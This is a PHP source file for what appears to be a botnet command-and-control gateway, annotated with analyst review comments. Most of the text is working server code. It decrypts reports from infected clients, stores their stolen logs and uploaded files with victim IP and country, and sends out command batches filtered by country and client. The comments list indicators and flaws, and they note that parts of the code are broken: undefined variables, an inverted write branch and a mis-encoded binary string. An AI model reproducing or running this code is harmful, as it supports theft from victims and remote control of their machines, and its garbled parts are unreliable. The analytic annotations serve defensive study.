<?php
/*********************/
/* */
/* Version : 5.1.0 */
/* Author : RM */
/* Comment : 071223 */
/* */
/*********************/
/**
 * Emits the fixed "no pending commands" reply and terminates the script.
 *
 * The layout mirrors the reply assembled at the bottom of this file: a
 * pack("LLL") header (total length = HEADER_SIZE + ITEM_HEADER_SIZE, 0,
 * item count 1), then 16 bytes that appear to be the raw MD5 of the 16 zero
 * bytes that follow (a single all-zero item header; ITEM_HEADER_SIZE is
 * presumably 16, matching the four-uint32 item header unpacked by the
 * caller), then those zero bytes. The non-ASCII bytes of the digest are
 * mis-encoded in this listing (shown as "¿"), so the literal below is not a
 * faithful copy of the original binary string.
 *
 * NOTE(review): every input is constant and BIN_CRYPTKEY is static, so the
 * RC4-encrypted empty reply is the same byte string for every request — a
 * stable response-side indicator for this gateway. rc4() and the constants
 * are defined in the required system/*.php files, not here.
 *
 * Never returns (calls exit()).
 */
function sendemptyreply( )
{
$reply_data = pack( "LLL", HEADER_SIZE + ITEM_HEADER_SIZE, 0, 1 )."J¿\x136¿K¿¿y¿u.#H\x18¿\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
echo rc4( $reply_data, BIN_CRYPTKEY );
exit( );
}
/**
 * Resolves the global $real_ipv4 to a country value via the ipv4toc table
 * (columns l / h read as the low / high end of an unsigned 32-bit range,
 * c as the country value).
 *
 * @return string  Column c of the first matching row, or "--" when no row
 *                 matches, the query fails, or the address is not valid IPv4.
 *
 * The value interpolated into the SQL is sprintf("%u", ip2long(...)), i.e.
 * always a decimal integer string ("0" when ip2long() returns false), so the
 * client-controlled address does not reach this query text unescaped.
 * Relies on the legacy mysql_* extension (removed in PHP 7), which dates the
 * deployment to PHP 5.x; query errors are suppressed with '@'.
 */
function getcountryipv4( )
{
global $real_ipv4;
$ip = sprintf( "%u", ip2long( $real_ipv4 ) );
if ( ( $r = @mysql_query( "SELECT c FROM ipv4toc WHERE l<='".$ip."' AND h>='".$ip."' LIMIT 1" ) ) && ( $m = mysql_fetch_row( $r ) ) !== false )
{
return $m[0];
}
return "--";
}
/**
 * Reads the first four bytes of $str as a machine-order unsigned 32-bit
 * integer (pack format "L").
 *
 * @param string $str  Raw bytes from the decoded request.
 * @return int  The decoded value, or 0 when $str is too short for a full
 *              read (unpack() then returns false; its warning is suppressed).
 */
function touint( $str )
{
    $fields = @unpack( "L", $str );
    if ( !is_array( $fields ) )
    {
        return 0;
    }
    // is_numeric cannot fail for a successful unpack; kept as a guard.
    return is_numeric( $fields[1] ) ? $fields[1] : 0;
}
/**
 * Reads the first four bytes of $str as a machine-order signed 32-bit
 * integer (pack format "l").
 *
 * @param string $str  Raw bytes from the decoded request.
 * @return int  The decoded value, or 0 when the input is shorter than four
 *              bytes (unpack() returns false; the warning is suppressed).
 */
function toint( $str )
{
    $fields = @unpack( "l", $str );
    $ok = is_array( $fields ) && is_numeric( $fields[1] );
    return $ok ? $fields[1] : 0;
}
/**
 * Reads the first two bytes of $str as a machine-order unsigned 16-bit
 * integer (pack format "S").
 *
 * @param string $str  Raw bytes from the decoded request.
 * @return int  The decoded value, or 0 when fewer than two bytes are
 *              available (unpack() returns false; the warning is suppressed).
 */
function toushort( $str )
{
    $fields = @unpack( "S", $str );
    if ( is_array( $fields ) && is_numeric( $fields[1] ) )
    {
        return $fields[1];
    }
    else
    {
        return 0;
    }
}
// ---------------------------------------------------------------------------
// Request handler (flat script). Accepts a POST body from a reporting client
// ("BIN"), decrypts it with a shared RC4 key, checks an MD5 over the payload,
// splits it into (id, length, value) items, stores the report, and answers
// with any pending command batches framed and encrypted the same way.
//
// Helpers not defined in this file (rc4, connecttodb, createdir,
// tosqlsafemask, ftime) and every upper-case constant presumably come from
// the two required system/*.php files. Comments marked NOTE(review) are
// analyst observations about the code as recovered; the control flow below
// looks decompiler-generated (a do-block directly followed by else, an
// unreachable if after break), so brace structure is not necessarily the
// original source's.
// ---------------------------------------------------------------------------
define( "__REPORT__", "1" );
// Only POST is processed; any other method exits with an empty body.
if ( $_SERVER['REQUEST_METHOD'] !== "POST" )
{
exit( );
}
require_once( "system/global.php" );
require_once( "system/config.php" );
// Raw request body; '@' hides read failures, which then look like a short body.
$data = @file_get_contents( "php://input" );
$data_size = @strlen( $data );
// Minimum message: one header plus one item header.
if ( $data_size < HEADER_SIZE + ITEM_HEADER_SIZE )
{
exit( );
}
// The whole body is RC4 under the static BIN_CRYPTKEY shared with the client;
// possession of the key is the only "authentication" of a report.
$data = rc4( $data, BIN_CRYPTKEY );
// Integrity: raw MD5 of everything after the header must equal the 16 bytes
// at offset HEADER_MD5. strcmp() on binary strings is not constant-time.
if ( strcmp( md5( substr( $data, HEADER_SIZE ), true ), substr( $data, HEADER_MD5, 16 ) ) !== 0 )
{
exit( );
}
// Item parsing. Each item begins with four uint32 ("L4"): index 1 is the item
// id, index 3 the payload length; indices 2 and 4 are read but unused. The
// length is taken from the message as-is: an oversized value only shortens
// the substr() and ends the loop. If the header cannot be unpacked, $k is
// false, the reads yield null (warnings suppressed) and $i still advances by
// ITEM_HEADER_SIZE.
$list = array( );
$i = HEADER_SIZE;
while ( $i < $data_size )
{
$k = @unpack( "L4", @substr( $data, $i, ITEM_HEADER_SIZE ) );
$list[$k[1]] = @substr( $data, $i + ITEM_HEADER_SIZE, $k[3] );
$i += ITEM_HEADER_SIZE + $k[3];
}
unset( $data );
// A client version and a client id are mandatory (empty() also rejects "0").
if ( empty( $list[SBCID_BIN_VERSION] ) || empty( $list[SBCID_BIN_ID] ) )
{
exit( );
}
if ( !connecttodb( ) )
{
exit( );
}
// Identity fields. The *_q variants are addslashes()'d for the string-built
// SQL below; none of the queries in this file are parameterised.
$bin_id = trim( $list[SBCID_BIN_ID] );
$bin_id_q = addslashes( $bin_id );
$binnet = empty( $list[SBCID_BINNET] ) ? DEFAULT_BINNET : trim( $list[SBCID_BINNET] );
$binnet_q = addslashes( $binnet );
$bin_version = touint( $list[SBCID_BIN_VERSION] );
// NOTE(review): the recorded address can be supplied by a plain GET parameter
// (?ip=...), with REMOTE_ADDR only as the fallback. ipv4/country values found
// in a recovered database therefore cannot be assumed to be genuine peer
// addresses.
$real_ipv4 = trim( !empty( $_GET['ip'] ) ? $_GET['ip'] : $_SERVER['REMOTE_ADDR'] );
$country = getcountryipv4( );
$country_q = addslashes( $country );
$curtime = time( );
// A client whose last report is older than BIN_TIMEOUT minutes counts as offline.
$rtime_min_online = $curtime - BIN_TIMEOUT * 60;
// Dispatch on which item ids are present. The do { } while ( 0 ) is a
// single-pass block so "break" means "skip to command delivery".
if ( !empty( $list[SBCID_BATCH_STATUS] ) )
{
do
{
// Batch-completion report: append this client id to the batch's
// NUL-delimited complete_BINs list and bump its counter.
mysql_query( "UPDATE bincmdbatches SET complete=complete+1, complete_BINs=CONCAT(complete_BINs, '\\0".$bin_id_q."\\0') WHERE batch_id='".toint( $list[SBCID_BATCH_STATUS] )."' LIMIT 1" );
// Leftover debugging: the last MySQL error text is written to a file named
// literally "2" in the script's working directory. A file of that name next
// to this script is a usable on-disk indicator of this gateway.
file_put_contents( "2", mysql_error( ) );
sendemptyreply( );
}
else
{
if ( !empty( $list[SBCID_BINLOG] ) || !empty( $list[SBCID_BINLOG_TYPE] ) )
{
$type = touint( $list[SBCID_BINLOG_TYPE] );
if ( $type == BLT_FILE )
{
// File upload. Stored under REPORTS_PATH/files/<binnet>/<client id>/<dest path>.
// Extensions in $bad_exts get ".dat" appended so the web server will not
// treat the upload as a script; the check is by extension only.
$bad_exts = array( "php", "asp", "exe", "pl", "cgi", "cmd", "bat" );
$fd_hash = md5( $list[SBCID_BINLOG] );
// NOTE(review): $BINnet and $BIN_id are never assigned in this file (the
// assigned names are $binnet / $bin_id); as written they are undefined.
// Most likely a decompiler/obfuscation artefact rather than original code.
$file_path = str_replace( "\\", "/", "/".$BINnet."/".$BIN_id."/".( empty( $list[SBCID_PATH_DEST] ) ? "unknown" : $list[SBCID_PATH_DEST] ) );
// Traversal guard: only the literal "/.." sequence is rejected.
if ( strpos( $file_path, "/.." ) === false )
{
$file_path = REPORTS_PATH."/files/".$file_path;
$inf = pathinfo( $file_path );
if ( empty( $inf['extension'] ) )
{
$inf['extension'] = "dat";
}
// "*" is a placeholder replaced by "", "[1]", "[2]", ... in the loop below.
$file_path = $inf['dirname']."/".basename( $inf['basename'], ".".$inf['extension'] )."*.".$inf['extension'];
if ( array_search( strtolower( $inf['extension'] ), $bad_exts ) !== false )
{
$file_path .= ".dat";
}
$i = 0;
// Up to 9999 numbered variants are tried. NOTE(review): as recovered, a
// file is written only when a variant already exists and differs in
// size/MD5 (it is then overwritten in place), while a non-existent variant
// is skipped and never created; that inversion is likely a decompiler
// artefact of an else that belonged to the file_exists() test.
for ( ; $i < 9999; ++$i )
{
$f = str_replace( "*", $i == 0 ? "" : "[".$i."]", $file_path );
if ( file_exists( $f ) )
{
// Same size and same MD5 as the upload: identical content, nothing to do.
if ( ( $fd_size = filesize( $f ) ) && strcmp( md5_file( $f ), $fd_hash ) === 0 )
{
break;
// Unreachable: follows an unconditional break (decompiler residue).
if ( md5_file( $f ) )
{
break;
}
}
else
{
// createdir() result is ignored; only the fopen() failure exits.
if ( createdir( $inf['dirname'] ) )
{
}
if ( !( $h = fopen( $f, "wb" ) ) )
{
exit( );
}
flock( $h, LOCK_EX );
fwrite( $h, $list[SBCID_BINLOG] );
flock( $h, LOCK_UN );
fclose( $h );
}
break;
}
}
}
else if ( REPORTS_TO_DB == 1 )
{
// Log records go to a per-day table reports_YYMMDD (UTC date), created on
// demand from the "reports" template table. Useful schema indicators:
// reports_*, BINlist, BINcmdbatches/bincmdbatches, ipv4toc.
// NOTE(review): $BINnet_q and $BIN_version are not assigned in this file
// (see $binnet_q / $bin_version above).
$table = "reports_".gmdate( "ymd", $curtime );
$query = "INSERT DELAYED INTO ".$table." SET BIN_id='".$bin_id_q."',BINnet='".$BINnet_q."',BIN_version='".$BIN_version."',path_source='".( empty( $list[SBCID_PATH_SOURCE] ) ? "" : addslashes( $list[SBCID_PATH_SOURCE] ) )."',path_dest='".( empty( $list[SBCID_PATH_DEST] ) ? "" : addslashes( $list[SBCID_PATH_DEST] ) )."',time_system='".( empty( $list[SBCID_TIME_SYSTEM] ) ? 0 : toint( $list[SBCID_TIME_SYSTEM] ) )."',time_tick='".( empty( $list[SBCID_TIME_TICK] ) ? 0 : toint( $list[SBCID_TIME_TICK] ) )."',time_localbias='".( empty( $list[SBCID_TIME_LOCALBIAS] ) ? 0 : toint( $list[SBCID_TIME_LOCALBIAS] ) )."',os_version='".( empty( $list[SBCID_OS_INFO] ) ? "" : addslashes( $list[SBCID_OS_INFO] ) )."',language_id='".( empty( $list[SBCID_LANGUAGE_ID] ) ? 0 : toushort( $list[SBCID_LANGUAGE_ID] ) )."',process_name='".( empty( $list[SBCID_PROCESS_NAME] ) ? "" : addslashes( $list[SBCID_PROCESS_NAME] ) )."',type='".$type."',ipv4='".addslashes( $real_ipv4 )."',country='".$country_q."',rtime='".$curtime."',context='".addslashes( $list[SBCID_BINLOG] )."'";
// First attempt; on failure create the day table and retry once.
if ( @!mysql_query( $query ) || @( !mysql_query( "CREATE TABLE IF NOT EXISTS ".$table." LIKE reports" ) && !@mysql_query( $query ) ) )
{
exit( );
}
}
else if ( REPORTS_TO_FS == 1 )
{
// Filesystem logging: REPORTS_PATH/logs/<binnet>/<ipv4>/<client id>, opened
// with "wb", so each report overwrites the previous file for that client.
// The client-controlled $real_ipv4 becomes a directory component; only the
// "/.." sequence is filtered. $BINnet / $BIN_id: see the note above.
$file_path = str_replace( "\\", "/", "/".$BINnet."/".$real_ipv4 );
if ( !( strpos( $file_path, "/.." ) === false ) )
{
break;
}
$file_path = REPORTS_PATH."/logs/".$file_path;
if ( createdir( $file_path ) )
{
}
if ( !( $h = fopen( $file_path."/".$BIN_id, "wb" ) ) )
{
exit( );
}
flock( $h, LOCK_EX );
// Plain "key=value" lines, CRLF-separated; ftime() formats timestamps and is
// defined elsewhere. Note the process name and context are written unescaped.
fwrite( $h, "bin_id=".$bin_id."\r\nbinnet=".$binnet."\r\ntime_system=".( empty( $list[SBCID_TIME_SYSTEM] ) ? 0 : ftime( "H:i:s d.m.Y", toint( $list[SBCID_TIME_SYSTEM] ) ) )."\r\ntime_tick=".( empty( $list[SBCID_TIME_TICK] ) ? 0 : toint( $list[SBCID_TIME_TICK] ) )."\r\ntime_localbias=".( empty( $list[SBCID_TIME_LOCALBIAS] ) ? 0 : toint( $list[SBCID_TIME_LOCALBIAS] ) )."\r\nlanguage_id=".( empty( $list[SBCID_LANGUAGE_ID] ) ? 0 : toushort( $list[SBCID_LANGUAGE_ID] ) )."\r\nprocess_name=".( empty( $list[SBCID_PROCESS_NAME] ) ? "" : $list[SBCID_PROCESS_NAME] )."\r\ntype=".$type."\r\nipv4=".$real_ipv4."\r\ncountry=".$country."\r\nrtime=".ftime( "H:i:s d.m.Y", $curtime )."\r\ncontext=".$list[SBCID_BINLOG]."\r\n\r\n\r\n" );
flock( $h, LOCK_UN );
fclose( $h );
}
}
else if ( !empty( $list[SBCID_BIN_STATUS] ) )
{
// Check-in / heartbeat: upsert the client row in BINlist. flag_install is 1
// when the reported status equals BS_INSTALLED; on a duplicate key,
// rtime_online is reset only if the previous report fell outside the
// BIN_TIMEOUT window. Success falls through (break) to command delivery.
// $BINnet_q / $BIN_version: see the note above about unassigned names.
$query = "BIN_id='".$bin_id_q."',BINnet='".$BINnet_q."',BIN_version='".$BIN_version."',net_latency='".( empty( $list[SBCID_NET_LATENCY] ) ? 0 : touint( $list[SBCID_NET_LATENCY] ) )."',port_s1='".( empty( $list[SBCID_PORT_S1] ) ? 0 : toushort( $list[SBCID_PORT_S1] ) )."',time_localbias='".( empty( $list[SBCID_TIME_LOCALBIAS] ) ? 0 : toint( $list[SBCID_TIME_LOCALBIAS] ) )."',os_version='".( empty( $list[SBCID_OS_INFO] ) ? "" : addslashes( $list[SBCID_OS_INFO] ) )."',language_id='".( empty( $list[SBCID_LANGUAGE_ID] ) ? 0 : toushort( $list[SBCID_LANGUAGE_ID] ) )."',ipv4='".addslashes( $real_ipv4 )."',country='".$country_q."',rtime_last='".$curtime."'";
if ( mysql_query( "INSERT INTO BINlist SET rtime_first='".$curtime."', rtime_online='{$curtime}', flag_install='".( touint( $list[SBCID_BIN_STATUS] ) == BS_INSTALLED ? 1 : 0 )."', ".$query.( "ON DUPLICATE KEY UPDATE rtime_online=IF(rtime_last <= '".$rtime_min_online."', '{$curtime}', rtime_online), {$query}" ) ) )
{
break;
}
exit( );
}
else
{
// Neither a log nor a status item: nothing to store, no reply body.
exit( );
}
} while ( 0 );
}
// Command delivery. Reached via "break" from the log/status branches above.
// Pending batches come from BINcmdbatches, filtered by NUL-delimited allow/
// deny lists on country, binnet and client id, at most 10 per reply; each
// delivered batch's "sended" counter is incremented. tosqlsafemask() is
// defined elsewhere (presumably escaping for LIKE patterns — not verified).
// NOTE(review): $BIN_id_q / $BINnet_q are again the unassigned upper-case
// names, so as recovered the id/binnet filters would be applied to empty
// values.
$reply_data = "";
$reply_count = 0;
$BIN_id_q = tosqlsafemask( $BIN_id_q );
$BINnet_q = tosqlsafemask( $BINnet_q );
$country_q = tosqlsafemask( $country_q );
$r = @mysql_query( "SELECT id, batch_id, batch_text FROM BINcmdbatches WHERE flag_disabled=0 AND (send_limit=0 OR sended < send_limit) AND ".( "(complete_BINs NOT LIKE '%\\0".$BIN_id_q."\\0%') AND " ).( "(countries_wl='' OR countries_wl LIKE BINARY '%\\0".$country_q."\\0%') AND " ).( "(countries_bl NOT LIKE BINARY '%\\0".$country_q."\\0%') AND " ).( "(binnets_wl='' OR binnets_wl LIKE BINARY '%\\0".$BINnet_q."\\0%') AND " ).( "(binnets_bl NOT LIKE BINARY '%\\0".$BINnet_q."\\0%') AND " ).( "(BINs_wl='' OR BINs_wl LIKE BINARY '%\\0".$BIN_id_q."\\0%') " )."LIMIT 10" );
while ( $r && ( $m = mysql_fetch_row( $r ) ) )
{
// One reply item per batch: uint32 batch_id, 0, size, size, then batch_text.
$size = strlen( $m[2] );
$reply_data .= pack( "LLLL", $m[1], 0, $size, $size ).$m[2];
++$reply_count;
@mysql_query( "UPDATE bincmdbatches SET sended=sended+1 WHERE id='".$m[0]."' LIMIT 1" );
}
if ( 0 < $reply_count )
{
// Reply framing mirrors the request: header (total size, 0, item count),
// raw MD5 of the items, the items; then RC4 with the same static key.
$reply_data = pack( "LLL", HEADER_SIZE + strlen( $reply_data ), 0, $reply_count ).md5( $reply_data, true ).$reply_data;
echo rc4( $reply_data, BIN_CRYPTKEY );
exit( );
}
// No batches: the constant empty reply (see sendemptyreply()).
sendemptyreply( );
?>